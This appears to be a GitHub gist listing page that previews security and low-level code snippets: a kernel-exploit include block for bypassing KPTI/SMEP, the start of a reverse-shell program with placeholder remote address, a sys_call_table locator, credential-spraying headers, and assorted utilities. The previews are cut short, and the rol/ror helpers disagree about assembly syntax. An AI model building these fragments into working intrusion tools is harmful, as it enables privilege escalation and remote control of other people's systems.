
nasm n4sm

@ameetsaahu
ameetsaahu / spray_cred.md
Created November 30, 2022 13:52
Cred spraying techniques

Using capset

// Thanks to @pqlqpql
#include <linux/io_uring.h>
#include <sys/capability.h>
#include <sys/syscall.h>

struct user_cap_data_struct {
    uint32_t effective;
    uint32_t permitted;
@n4sm
n4sm / tiny_parser.rs
Last active February 17, 2024 04:10
A very small ELF parser developed in Rust (only the executable header for now)
use std::fs::File;
use std::fs::{OpenOptions};
use std::io::{Read};
//use std::mem::{size_of, transmute};
/*
typedef struct
{
unsigned char e_ident[EI_NIDENT]; // Magic number and other info
Elf64_Half e_type; // Object file type
@n4sm
n4sm / exploit.c
Last active August 19, 2021 12:24
Kernel Exploitation - ROP bypass KPTI / smep
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#include <sys/ioctl.h>
@n4sm
n4sm / open_self_linux_nasm.asm
Last active July 25, 2020 20:16
An assembly program, written in NASM, that opens its own file once it is mapped and executed (for example, as a basis for self-modifying code)
; https://github.com/n4sm/AD_1DA/tree/master/AD_1DA
BITS 64
section .text
global _start
_start:
mov r13, 0x1111111111111111
@icecr4ck
icecr4ck / idapython_cheatsheet.md
Last active April 23, 2024 18:45
Cheatsheet for IDAPython
@Spl3en
Spl3en / rol_ror.c
Created February 21, 2017 21:11
rol / ror gcc
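/*
 * Rotate the 32-bit value `in` left by `x` bit positions and return the result.
 *
 * Written in plain C rather than inline assembly. The earlier template,
 * "rol %%eax, %%cl", listed the operands destination-first, which GCC's
 * default AT&T dialect rejects (it expects the count first: "rol %%cl, %%eax"),
 * so at best it assembled only in an Intel-syntax build. Optimising compilers
 * typically turn the shift/or idiom below into a single rotate instruction.
 *
 * The count is reduced modulo 32, matching what the x86 `rol` instruction
 * does with a count in CL on a 32-bit operand; this also keeps both shifts
 * below the operand width, so x == 0 and x >= 32 are well defined.
 *
 * Assumes `int` is 32 bits wide. The final conversion back to `int` relies on
 * the two's-complement wrap-around that GCC documents for out-of-range values.
 *
 * `static` is added so that a call the compiler chooses not to inline still
 * has a definition to link against under C99 and later inline rules.
 */
static inline int rol (int in, int x) {
    const unsigned int bits = (unsigned int)in;
    const unsigned int count = (unsigned int)x & 31u;

    /* (32 - count) & 31 maps count == 0 to a shift of 0 instead of 32. */
    return (int)((bits << count) | (bits >> ((32u - count) & 31u)));
}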
inline int ror (int in, int x) {
int res;
__asm__ __volatile__("ror %%eax, %%cl" :"=a"(res) :"a"(in), "c"(x));
@ilg-ul
ilg-ul / license-gpl-c-header.txt
Last active April 10, 2024 14:21
C header with GPL license text.
/*
* This file is part of the XXX distribution (https://github.com/xxxx or http://xxx.github.io).
* Copyright (c) 2015 Liviu Ionescu.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 3.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
@acapola
acapola / aes-ni.c
Created August 31, 2015 14:42
AES128 how-to using GCC and Intel AES-NI
#include <stdint.h> //for int8_t
#include <string.h> //for memcmp
#include <wmmintrin.h> //for intrinsics for AES-NI
//compile using gcc and following arguments: -g;-O0;-Wall;-msse2;-msse;-march=native;-maes
//internal stuff
//macros
#define DO_ENC_BLOCK(m,k) \
do{\
@0xabe-io
0xabe-io / reverse_shell.c
Created January 6, 2015 15:24
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
@Cr4sh
Cr4sh / gist:fe910f0d1b0559efd43d
Created September 3, 2014 19:55
Dynamically finding sys_call_table on Linux x86_64 systems
void **find_sys_call_table(void *kernel_addr, int kernel_size)
{
/*
Check for the system_call_fastpath() signature, hand-written piece of
assembly code from arch/x86/kernel/entry_64.S:
ja badsys
mov rcx, r10
call sys_call_table[rax * 8]
mov [rsp + 20h], rax